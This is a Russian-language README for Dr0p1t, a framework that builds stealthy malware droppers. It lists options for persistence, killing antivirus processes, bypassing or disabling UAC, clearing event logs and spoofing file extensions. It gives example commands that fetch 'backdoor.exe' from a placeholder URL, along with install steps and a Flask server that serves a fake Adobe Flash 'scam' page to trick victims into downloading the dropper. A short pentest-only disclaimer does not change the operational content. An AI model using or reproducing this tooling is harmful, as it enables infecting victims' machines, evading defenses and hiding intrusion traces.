
Фреймворк, который создает продвинутого скрытного дроппера, обходящего большинство антивирусов и обладающего множеством трюков.
Вы когда-нибудь слышали о троянских дропперах? Коротко: дроппер — это тип вредоносного ПО, которое загружает другие вредоносные программы, а Dr0p1t даёт вам возможность создать скрытный дроппер, обходящий большинство антивирусов и обладающий множеством трюков (Поверьте мне :D) ;)
+ Свойства создаваемого исполняемого файла:
+ Свойства фреймворка:
+ Модули:
+Модули постоянства:

Всё ещё не полностью протестировано! Нужны участники и тестировщики 😄
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
Рекомендуемая версия для Python 2 — 2.7.x, для Python 3 — 3.5.x. Не используйте 3.6, так как она ещё не поддерживается PyInstaller.
Примечание: необходим root-доступ
Существует список официальных видео по установке и использованию Dr0p1t: Плейлист
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Примечание: в Python 2.7 нет pip, поэтому сначала установите его из скрипта get-pip.py [Гуглите]
Примечание: сервер всё ещё в бета-версии, имеет много функций для добавления, а также лучший дизайн [Нужен дизайнер для участия :D]
На Linux и Windows после установки Dr0p1t, выполнив указанные выше шаги, установите модули из server_requirements.txt с помощью pip, например:
python -m pip install -r server_requirements.txt
Теперь запустим наш серверный скрипт:
python Dr0p1t_Server.py
После запуска серверного скрипта он начнёт прослушивать все подключения к порту 5000, используя flask.
Чтобы использовать сервер со своего устройства, откройте в браузере 127.0.0.1:5000 или [Ваш IP]:5000.
Для открытия с других устройств в локальной сети откройте [Ваш локальный IP]:5000, а для других устройств в глобальной сети — [Ваш глобальный IP]:5000, но предварительно убедитесь, что вы настроили маршрутизатор на перенаправление порта 5000 на вас.
После открытия страницы сервера вы увидите простой веб-сайт с простым дизайном, запрашивающий необходимые данные См. скриншоты сервера
Затем отправьте данные, они пройдут проверку, после чего будет создан exe-файл, и вы будете перенаправлены на страницу с указанием ссылки для скама.
После перехода по ссылке вы увидите скам для загрузки дроппера, который по умолчанию представляет собой страницу загрузки Adobe Flash. Чтобы заменить скам на свой, замените содержимое файла "Scam.html" своим, но помните о переменных (не удаляйте их).

Подробнее для Windows Подробнее для Linux

Если этот инструмент оказался для вас полезным, не стесняйтесь поблагодарить меня, купив мне кофе :)
Dr0p1t Framework не несёт ответственности за неправильное использование и за незаконные цели. Используйте только для пентеста или в образовательных целях!!!
Копирование кода из этого фреймворка или его использование в другом инструменте допускается при условии указания источника 😄
Pull requests всегда приветствуются :D